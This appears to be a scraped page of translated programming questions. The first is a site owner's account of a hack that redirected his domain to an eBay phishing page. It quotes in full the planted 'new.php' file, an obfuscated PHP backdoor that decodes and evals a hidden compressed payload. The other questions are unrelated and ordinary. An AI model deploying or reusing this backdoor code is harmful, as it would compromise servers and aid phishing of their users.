问题列表 - 第44015页

最近我的一个网站被黑了.虽然实际网站保持不变,但他们能够以某种方式使用该域创建一个重定向到ebay网络钓鱼诈骗的链接.

由于显而易见的原因,我把网站关闭了,所以我无法链接到代码.我想知道如何找出他们使用的漏洞,以便将来可以避免这个问题.该页面使用PHP,还有一些javascript(用于表单验证).

是否有免费服务会扫描我的代码中的漏洞？我还有什么其他选择？

谢谢,杰夫

编辑:我托管了[链接删除]的文件

有几点需要注意:"funcs"文件夹中有几个文件,其中大部分都没有使用过,但为了以防万一,我把它们留在了那里."data"文件夹中的"new.php"(下面的内容)显然是个问题.最大的问题是,有人如何设法将"new.php"上传到服务器？还收到了我收到的电子邮件的RTF,其中包含有关骗局的信息.

(注意:此代码可能对您的计算机"危险")

    <?php
 $prv=strrev('edoced_46esab');
 $vrp=strrev('etalfnizg');
 eval($vrp($prv("rVPRbpswFNW0P9jbNE1ChojQSDD7cm0syvoB5A/GxhiBJVoKxJC0pFr667v0pe1L2k17snyvz/G559jOLxCVxjGCfEBYc1noQfE8VL0SpUYTwQah43LQueKbh3IeQYlguBx1p/gQqkqJFUKiPsWO0Vgh9LoN1R4EoUsuq7xU3Cgxgug0DhHQiVVOjVavFK9ClbDjKH2ZLgOrbpoA0RbNj/dv3r77KF3ED237vVlkrH9Wu7srzM1uv7t3h942N5mTsYM7O52s0y5jsz3thntz6gvCPiWcEVubLpO0tme+VxdHGdq3xe90WU+0wg+hQREGEi9c9G18gprOBPPZBWTMfixP1YwFdlMcNw9UVInT5XjLYqcHQcOSTxvFGyV+5q3GPcKgOzKHHFUi+Te/YmerBK0Nua/XectlnU+JRDBq7OjWKRJOEE0tSqaKIOkHs62a+StEebFDgR4UL7jc5l0Ea9JBXNiSDD3F5bpx3Zq5syaIpudx0FiAuI7gwGVPCpW4TugtnGlf/v0EZ/kWC+8F0ZafWOXazFuzeo0JX87d9tWzvlnOf/s4Xlwdiu2cXX1m/gtT+OzyinnxHw==")));
?>

在WP7中,只要单击一个按钮,按钮的背景就会变为白色,表示单击该按钮并在释放鼠标按钮时变为正常.但是我想将按钮选择的颜色从白色更改为橙​​色.如何​​点亮它？

我基本上试图找到设计UITableViewCell的正确方法,其中包含两个UITextViews和三个UILabel.两个UITextView具有动态内容,并且直到运行时才能确定它们的大小.

我已经尝试了各种方法根据运行时加载的内容重新计算我的UITextViews的高度,虽然非常费力和无聊,我已经得到了它的工作,但他们然后流失位于下面的xib中的UILabels他们.

在计算UITextViews的新大小后,我是否真的必须重新计算每个UILabel的y坐标？有没有办法简单地让xib中的元素"推"下面的元素根据它们的新大小？

使用多个动态文本视图配置UITableViewCell的正确方法是什么,以便我的整个应用程序不包含计算高度和坐标的代码？

或者是我不应该在同一个UITableViewCell中放置多个动态UITextView的答案？

我有以下示例:

data <- structure(list(a = c(-1.25549186262767, -0.840855480786298, -
0.635371312524283, 
-0.602907981454667, -0.472166385166945, -0.285773634866154, 0.0701427664273268, 
0.138108224803923, 1.38435934347858, 1.71144087270237), b = c(-3.44400412039417, 
0.675644682353751, -1.04793816522475, -7.38303347186651, 2.34519166466874, 
0.334780748573386, 4.76806919070976, 4.8633533150074, 3.50106026731172, 
-1.27172351054143), c = c(-3.02376206439776, -2.56390769080574, 
-1.48659913867609, -1.27976202274701, -0.368725655874139, 1.08537150160227, 
3.98619381956471, 4.50687017428731, 4.10341582203292, -1.61769414438858
), d = c(5.71851494232005, 2.90539833491649, 2.75195159216204, 
2.73478241733301, 2.65941820902101, 2.60630235726839, 3.34836154776286, 
3.62938300664006, 4.61153521538016, 5.56230567213863), e = c(8.98703236551896, 
4.5660296657415, 4.32487774825464, 4.29789523068949, 4.17945528847841, 
4.09598014088541, 5.26217626511884, 5.70382046327322, 7.24733897758039, 
8.74153894964533)), .Names = c("a", "b", "c", "d", "e"), row.names = c(NA, 
-10L), class = "data.frame")

ggplot(data, …

Redis的数据库大小与内存比率是多少？

例如,如果我有一个80MB的数据库,Redis将使用多少RAM(与普通的Web应用程序一起使用时)？

我有一个包含两个文本框以及其他一些控件的用户控件。我希望能够将复杂类型拖放到此控件上，并且希望整个控件成为放置目标，包括文本框和组合控件周围的空间。删除数据后，会将其拆分为组件字段，每个字段由用户控件中的控件表示。

我遇到的问题是，文本框（如果我将AllowDrop设置为true）正在尝试做自己的拖放操作，并且将仅接受拖放数据的文本格式。如果在文本框中将AllowDrop设置为false，则完全禁用了文本框的放置。我可以将复杂的数据拖到标签，复选框等中，并且其行为与我期望的完全一样。

此外，其他控件周围的空间似乎不被视为有效的放置目标。

关于如何使文本框充当控件（例如标签，复选框或组合框）的任何想法，为什么不将网格视为有效的放置目标？

用户控件的来源：

<UserControl x:Class="DragDropTester.CompositeControl"
         xmlns="http://schemas.microsoft.com/winfx/2006/xaml/presentation"
         xmlns:x="http://schemas.microsoft.com/winfx/2006/xaml"
         xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" 
         xmlns:d="http://schemas.microsoft.com/expression/blend/2008" 
         mc:Ignorable="d" 
         d:DesignHeight="226" d:DesignWidth="428" AllowDrop="True">
    <Grid AllowDrop="True">        
        <TextBox Height="23" Margin="115,12,12,0" Name="textBox1" VerticalAlignment="Top" AllowDrop="False" />
        <Label Content="TextBox 1:" Height="28" HorizontalAlignment="Left" Margin="12,12,0,0" Name="label1" VerticalAlignment="Top" Width="97" />
        <TextBox Height="23" Margin="115,41,12,0" Name="textBox2" VerticalAlignment="Top" AllowDrop="False" />
        <Label Content="TextBox 2:" Height="28" HorizontalAlignment="Left" Margin="12,41,0,0" Name="label2" VerticalAlignment="Top" Width="97" />
        <CheckBox Content="CheckBox" Height="16" Margin="115,70,150,0" Name="checkBox1" VerticalAlignment="Top" />
        <ComboBox Height="23" Margin="115,92,12,0" Name="comboBox1" VerticalAlignment="Top" />
    </Grid>
</UserControl>

和后面的代码：

using System;
using System.Collections.Generic;
using System.Linq;
using System.Text;
using System.Windows;
using System.Windows.Controls;
using …

运行以下ruby脚本时:

puts gets.inspect

在终端上,我被提示输入,然后显示inspect输出,但如果我使用CMD+R快捷方式从TextMate内部运行相同的脚本,那么它只是输出nil,好像没有gets方法.

为什么是这样？从我所读到的内容,当脚本请求STDIN的输入时,TextMate应该显示一个输入对话框,但在这种情况下不会发生这种情况.

在我的代码中,我有2/4个线程执行montecarlo模拟.他们每个人都进行了许多实验,他们都将结果收集到一个stl向量中.我的问题是:假设每个线程顺序运行1000个实验.最好是将结果存储在共享向量中,或者每隔一段时间存储一次？如果他们等到他们有一定数量的数据,写入向量将需要更长时间,所以我不确定第二个解决方案是否必然比第一个更好.

PS每个实验都是数值计算,所以没有IO操作.

谢谢

使用Mongoid,如果我有一个帐户模型并且想要为该帐户分配具有特定角色的用户,最好是将该关系嵌入帐户,用户还是创建角色集合映射帐户到具有角色名称的用户？

我希望能够返回帐户的所有用户,并验证当前用户是否可以使用Cancan等帐户访问该帐户.

构建基于帐户< - >用户角色的关系的推荐方法是什么？用户可能属于可能具有不同角色的多个帐户,类似于Basecamp的工作方式.

我想从该函数内部获取函数的名称.例如:

function blah() {
    //I want to get the string "blah" here, from the function's name
}

或者至少是Function对象？